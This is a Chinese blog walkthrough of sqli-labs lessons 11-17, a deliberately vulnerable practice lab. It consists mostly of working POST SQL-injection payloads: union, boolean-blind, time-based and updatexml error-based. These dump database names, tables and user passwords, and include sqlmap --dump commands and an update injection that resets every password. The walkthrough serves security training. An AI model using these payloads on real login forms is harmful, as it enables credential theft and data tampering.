SQLI-LIBS POST型注入11-17题实战

最新推荐文章于 2024-08-19 17:47:45 发布
最新推荐文章于 2024-08-19 17:47:45 发布
阅读量183 收藏
点赞数
文章标签: mysql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42261604/article/details/120436448
版权

目录

Less-11

less-12

Less-13

Less-14

Less-15

Less-16

Less-17

Less-11

       POST ‘单引号注入

       判断显示位

uname=&passwd=' union select 1,2 -- - 确认显示位为1和2

       数据库名和数据库用户

uname=&passwd=' union select user(),database()-- - security和root@localhost

       表名

uname=&passwd=' union select 1,group_concat(table_name) from information_schema.tables where table_schema="security" -- -   确认表名emails,referers,uagents,users

       users表字段名

uname=&passwd=' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"-- - 确认字段名id,username,password

       爆字段

uname=&passwd=' union select group_concat(username),group_concat(password) from users -- -  得到账号和密码

less-12

       POST双引号加)注入判断

uname=&passwd=" and 1=1 -- - 报错

uname=&passwd=") and 1=1 -- - 正常

       判断显示位

uname=&passwd=") union select 1,2  -- -

       余下操作与less-1同理

Less-13

       单引号双报错注入

uname=admin&passwd=admin') order by 2-- - 判断查询位为2位

       判断数据库名长度

uname=admin&passwd=admin') and length(database())>8 -- - 报错

uname=admin&passwd=admin') and length(database())>7 -- - 正常 数据库长度为8

       判断数据库名首字母ASCII码值

uname=admin&passwd=admin') and ascii(left(database(),1))>114 -- - 正常

uname=admin&passwd=admin') and ascii(left(database(),1))>115 -- - 报错 说明首字母为s

       判断数据库第二个字母

uname=admin&passwd=admin') and ascii(substr(database(),2,1))>101 -- - 报错

uname=admin&passwd=admin') and ascii(substr(database(),2,1))>100 -- - 说明第二个字母为e

       依次算出数据库名为security

       判断数据表数量

uname=admin&passwd=admin') and (select count(table_name) from information_schema.tables where table_schema="security")=4 -- - 数量为4

       判断第一个表首字母

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>100 -- - 正常

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>101 -- - 报错 首字母为e

       判断第一个表第二个字母

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),2,1))>108 -- - 正常

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),2,1))>109 -- - 报错,第二个字母为m

       判断第四个表第一个字母

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))>116 -- - 正常

uname=admin&passwd=admin') and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))>117 -- - 报错,第一个字母为u

       判断users表中有几个字段

uname=admin&passwd=admin') and (select count(column_name) from information_schema.columns where table_schema="security" and table_name="users" )=3 -- - 数量为3

       判断第一个字段的首字母

uname=admin&passwd=admin') and ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))>104 -- - 正常

uname=admin&passwd=admin') and ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))>105 -- - 报错  第一个字母为i

       得出id,username,password字段

       判断username字段第一个值的第一个字母

uname=admin&passwd=admin') and ascii(substr((select username from users limit 0,1),1,1))>67 -- - 正常

uname=admin&passwd=admin') and ascii(substr((select username from users limit 0,1),1,1))>68 -- - 报错  说明首字母为D

       判断用户名Dumb的密码

uname=admin&passwd=admin') and ascii(substr((select password from users where username="dumb"),1,1))>68 -- - 报错

uname=admin&passwd=admin') and ascii(substr((select password from users where username="dumb"),1,1))>68 -- - 正常 说明首字母为D

       至此账号密码都有了,使用脚本去跑

       抓包将post请求体和数据保存为123.txt,并使用sqlmap去跑

 

sqlmap -r 123.txt --dump -T users -D security

      

 

Less-14

       与13类似,将post请求头和请求头保存至文本中,使用sqlmap去跑

sqlmap -r 123.txt --dump -T users -D security --level 5 --risk 3

Less-15

       单引号盲注判断

uname=admin&passwd=admin' -- - 正常

uname=admin&passwd=admin“ -- - 异常

       判断数据库名长度

uname=admin&passwd=admin' and length(database())>8 and sleep(3)-- - 不停顿

uname=admin&passwd=admin' and length(database())>7 and sleep(3)-- - 停顿3秒,长度为8

       判断数据库名首字母

uname=admin&passwd=admin' and ascii(substr((database()),1,1))=115 and sleep(3)-- - 首字母为s

       剩下操作与13类似

       使用sqlmap跑出结果

Less-16

       双引号加)判断

uname=admin&passwd=admin") and sleep(3) -- - 睡眠了3秒

       剩下的操作与15一致,同样保存post数据到txt文件中使用sqlmap运行

sqlmap -r 123.txt --dump -T users -D security --level 5

Less-17

       单引号update型注入

uname=admin&passwd=admin' where 1=1 and sleep(2) -- - 睡眠2秒,该操作将所有密码都给设置成了admin

       延时注入

uname=admin&passwd=123' and length(database())=8 and sleep(2) -- - 延时26秒,因为数据库中有13条数据

       余下操作与上面一致,因为延时注入这种方法会将数据给改写,所以尝试报错注入

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- -得到数据库名security

       查询表

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e),1) -- - 得到数据表

       查询列名

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"),0x7e),1) -- - 得到字段名

       查询其他表的数据

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(email_id) from security.emails),0x7e),1) -- -

MajorTom0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs 提前准备篇
water0diamond的博客
03-12 943
SQL注入 介绍 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 原理 SQL注入攻击...
SQL注入学习part02:(结合sqli-libs学习:11-20关)
Q_U_A_R_T_E_R的博客
08-01 325
写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) SQL注入学习part02第十一关第十二关第十三关第十四关第十五关第十六关第十七关第十八关 第十一关 尝试了几组密码后返回报错 判断应该是POST单引号字符注入 猜测闭合符为单引号尝试发现报错 在单引号后加一个#,结果正常报错 所以可以确定闭合符 使用语句asdf ' or 1 #构造布尔表达式为真 登录成功 get it 第十二关 尝试闭合符试
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4995
SQL注入原理-POST注入
sqli-labs11-22关闯关心得与思路
m0_48294281的博客
03-28 4040
sqli-labs11-22关闯关心得与思路
SQLI-LIBS POST特殊位置注入18-20实战
qq_42261604的博客
09-24 950
目录 Less-18 Less-19 Less-20 Less-18 单引号user-agent注入判断 根据报错构造 1',1,1)# 验证成功 1',1,1‘)# 报错 说明构造的闭合语句成立 构造后语句如下 INSEERT INTO table VALUES('1' ,1,1)#','Ip','Username'),成功绕过 使用报错注入,直接检索前面获取的信息 1',1,extractvalue(1,concat...
sqli-liabs学习SQL注入之旅(第二十一关~第三十关)
guanjian_ci的博客
04-23 3075
二十一关 打开这一关,开屏暴击。报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码中加入中国时区的代码即可: date_default_timezone_set("PRC"); 其实不改这个也不影响我们做目,只是有错不改看着难受而已,页面正常后,开始正: 第一步:在账号密码框一顿输出后,发现注入点不在外面,只能登录进入里面看看,看到了页面显示了我们的UA、cookie等信息。有点类似第二十关,属于cookie注入!唯一不同的是这一关考察了一个加解密运用,cook.
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1421
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs靶场实战
u011417723的博客
03-08 2579
靶场实战
Sqli-libs(Less7~Less23)通关详解,通篇大白话,看完不懂直接v你50吃KFC
henghengzhao_的博客
10-18 1196
大白话讲解,通篇写的是我做的一个思路,建议先了解一下sql注入的基本原理再来看,主要针对人群,sql注入初学者,来刷sqli-libs靶场但是感觉吃力的。看完要还是不会,来来来,评论区留言,我v你50吃个KFC
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
11-08
【标】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
MYSQL----表的创建
2301_80251684的博客
08-17 195
1.field字段名,也就是属性,相当于java类里面的成员属性。7.创建表中加校验------if not exists。2.一条drop语句可以删除多个表,每个表之间用逗号隔开。1.temporary 表示的是自己创建的临时表。4.字段的定义在小括号中包裹起来,最后已分号结束。3.最后一个字段的定义,结束没有逗号。6.建议每张表都设置一个编号字段。2.datetype 数据类。如果表存在就生成一个警告信息。说明需要加''包裹起来。表示一个表的完全路径。
MySQL中处理JSON数据:大数据分析的新方向
Chujun123528的博客
08-18 1183
灵活性:JSON数据类允许你在单个列中存储复杂的数据结构,如数组和嵌套对象,这减少了需要创建多个表来存储相关信息的必要性。查询能力:MySQL为JSON数据类提供了一系列内置的函数,如, , , , , 等,使得查询和修改JSON数据变得非常便捷。索引支持:MySQL支持为JSON文档中的特定路径创建虚拟列(Generated Columns),然后可以在这些虚拟列上创建索引,从而加速基于JSON内容的查询。性能优化:随着MySQL的不断改进,对JSON数据的处理性能也在不断提高。虽然与专门的NoSQL
Java学习Day28:Mysql 第二章:斗气大陆
weixin_51721783的博客
08-16 998
设计数据库时,某一个字段属于一张表,但它同时出现另一个或多个表中,且完全等同于它在其本来所属表的意义表示尽量遵循范式理论的规约,尽可能少的冗余字段,让数据库设计看起来精致合理加入冗余字段,减少join,让数据库执行性能更好添加索引首先应考虑在 where 及 order by 涉及的列上建立索引。索引的优点大大的提高查询速度可以显著的减少查询中分组和排序的时间。索引的缺点创建索引和维护索引需要时间,而且数据量越大时间越长。
SpringBoot MySQL BinLog 监听数据变化(多库多表)
最新发布
掐指一算乀缺钱
08-19 523
SpringBoot MySQL BinLog 监听数据变化(多库多表) 库.表,库1.表1,库1.表2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值